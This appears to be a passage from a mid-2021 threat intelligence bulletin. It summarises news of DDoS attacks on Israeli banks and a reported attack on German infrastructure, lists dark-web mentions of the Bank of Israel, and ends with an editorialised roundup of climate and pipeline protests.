3 https://www.itworldcanada.com/article/cyber-security-today-june-28-2021-more-canadian-firms-hit-with-ransomware-nobelium-group-attempting-to-infiltrate-canadian-and-u-s-firms-dreamhost-data-fumble-and-more/455193

DragonForce / Israeli Banking - The Israeli banking system was attacked last weekend by hundreds of Malaysian hackers in an attempt to damage the state’s financial apparatus. The anti-Israel group of hackers called “DragonForce” who carried out the attack claimed they had damaged the entire system; the hackers posted screenshots that appeared to show the collapse of the computers on Israeli banking sites. However, it is estimated that in many cases these were fake pictures. The attack was carried out in three waves, was aimed at harming the services from the banks’ websites, and “even to try and film them through a distributed denial of service (DDoS) attack.” The final wave of attacks, launched in the late hours of 25 June, was the most intense and difficult of them all, according to the Hebrew-language Ynet site. “This is an urgent call for all hackers around the world to unite again and start a campaign against Israel,” the group’s Telegram group said. Hundreds of thousands of members joined via Twitter, Telegram, Facebook and a forum.

Against the background of Israel’s activities in Gaza, the group launched the current attack a few days before its planned date, distributing the Internet addresses of Israeli banks and inviting hackers who hated Israel from all over the world to participate in the attack. In Israel, cyber defense personnel prepared for the attack and reportedly prevented most of the attempts. A source at one of the banks told Ynet that when the bank’s cyber defense personnel managed to block the Internet addresses of the attackers, they saw a message on the screen as if the bank’s website had crashed. “Some of the time they posted all kinds of ‘successes’ [but] it was a ‘Photoshop’,” the source said. During a DDoS attack, the attackers launch thousands of calls simultaneously with the aim of causing the targeted site to crash. According to estimates by experts who participated in the defense of the banks, the scope of the attack reached approximately 200 megabytes per second, which is a considerable volume. The purpose of this type of attack is to exploit the high number of attackers to collapse the computer systems, rather than to infiltrate to obtain information. A source in the Israeli banking system said the targeted load of inquiries led to a brief slowdown and denial of service at all banks’ sites.

One of the attacks was aimed at the Bank of Israel. “From time to time attempts are made to carry out DDoS attacks on the Bank of Israel’s external website and on websites of government ministries,” the Bank of Israel said in a statement. “Such attempts are routinely blocked without damage to the website; thus in any case such attempts do not affect the bank’s systems.” Other banks issued similar statements, saying the attempted attack was “unsuccessful and no damage to any service or process was identified.”

DragonForce recently published one file that allegedly contained the names and addresses of hundreds of thousands of Israeli students and another that contained a list of Israelis’ passports as well as other personal data. In this case, however, experts in Israel’s cyber defense system said such attempts as those on the banks’ websites are “routinely recognized and stopped. In this case too, the banks were prepared and all attempts were stopped without harming the service or any process.”

Germany / Banking Attack - German authorities allegedly stopped a cyberattack on a data service provider used by federal agencies and pushed back on a report that a broad assault targeted critical infrastructure and banks.


The attempted attack was quickly handled and the impact on service was “very marginal,” an Interior Ministry spokesman told reporters on 30 June. He added that it was likely criminally motivated. German media cited unidentified intelligence sources saying that a hacker group linked to the Kremlin had carried out an attack on German infrastructure and the country’s banking system. The group was identified as “Fancy Lazarus” after earlier referencing “Fancy Bear,” a group controlled by Russia’s GRU military intelligence agency. German officials have not detected an increase in cyber activities in recent days. Germany’s BSI Federal Cyber Security Authority denied Twitter reports and said that the agency had no knowledge of the attack, which media sources said may be revenge for international sanctions leveled on Russia and Belarus.

Proofpoint Inc., a cybersecurity firm, said this month in its blog that Fancy Lazarus previously identified themselves as Fancy Bear and has been involved in an increasing number of so-called distributed denial-of-service attacks, including against the energy, financial and insurance industries. Such attacks attempt to overload systems by flooding the target with superfluous requests from multiple sources. Proofpoint said there was no known connection to the Fancy Bear group that has been labeled an advanced persistent threat.

A spokesperson for Deutsche Bank AG and Commerzbank AG and for lobby groups for savings, cooperative and private lenders said they were looking into the attempted cyber-attack. With elections looming in September and Chancellor Angela Merkel poised to step aside, German authorities are on the alert for the potential for interference from Russia, both in terms of cyberattacks on infrastructure as well as disinformation campaigns. The Green party’s chancellor candidate, Annalena Baerbock, has become a target given her strong opposition to the almost-completed Nord Stream 2 pipeline that would channel gas from Russia to Germany.

CYBER THREAT ANALYSIS CENTER (CTAC) 1 July 2021

Dark Web Collection/Analysis

Bank of Israel – Hits: 183

The Bank of Israel is the central bank of Israel. The bank's headquarters is in the Kiryat HaMemshala section of Jerusalem, with a branch office in Tel Aviv. The primary objective of the Bank of Israel is to maintain price stability and the stability of the financial system in Israel.


Activist Corner

Notes:
4 The Overton window is the range of policies politically acceptable to the mainstream population at a given time.
5 https://www.democracynow.org/2021/6/29/headlines/an_overt_political_blockade_minnesota_police_barricade_line_3_pipeline_protest_camp
6 https://patch.com/massachusetts/waltham/pipeline-protesters-stage-sit-enbridge-office-waltham

Two members of the US Congress are seen yukking it up with a Sunrise Movement (SM) youth reporter in the halls of Congress. This podcast is to further promote the Green New Deal, Civilian Climate Corps (CCC) and its unionization of the proposed workforce. These titles are a knock-off of the New Deal and CCC of the US Depression-era (1930s) programs under President F. Roosevelt. Sunrise Movement is a US political action youth organization that advocates political action on climate change. After political actions, they turned their focus on working towards shifting the Overton window on climate policy to center the environmental program known as the Green New Deal. Together with Justice Democrats and Alexandria Ocasio-Cortez, the group is now a highly organized activist group.

Last Monday, MN sheriff’s deputies barricaded access to an encampment of environmental activists who are resisting construction of the Enbridge Line 3 tar sands pipeline, which has the backing of the Biden administration. Officers towed several of the activists’ cars and made several arrests throughout the day. An attorney for the Indigenous-led protesters called the move “nothing less than an overt political blockade.” Over in Waltham MA, protesters opposing a compressor and pipeline project are staging a sit-in at the Waltham offices of Enbridge. Hmmmm. Coincidence? The protesters oppose the company's Weymouth compressor and Line 3 Pipeline projects, according to a tweet from an environmental reporter. Police arrived around noon to get the protesters out of the building for trespassing, according to the tweet. Last week marked the end of a global week of action against insurers of Canada’s Trans Mountain pipeline and its expansion project. The protests, calling on its insurers to cut ties with the federally owned pipeline, spanned 25 actions across four continents. Another coincidence?

Last Sunday, London Police arrested 23 members of the activist group Extinction Rebellion during a “Free the Press” day of protest against media corruption in the United Kingdom. The highlight of the Sunday action was when protesters dumped seven tons of horse manure at the doorsteps of the British tabloid Daily Mail and defaced its entrance with spray paint. Protesters sent a message to four billionaires who they say control 68% of the UK’s print media to “cut the bullsh*t!” and demanded “an end to media corruption that suppresses the truth from the public for profit.”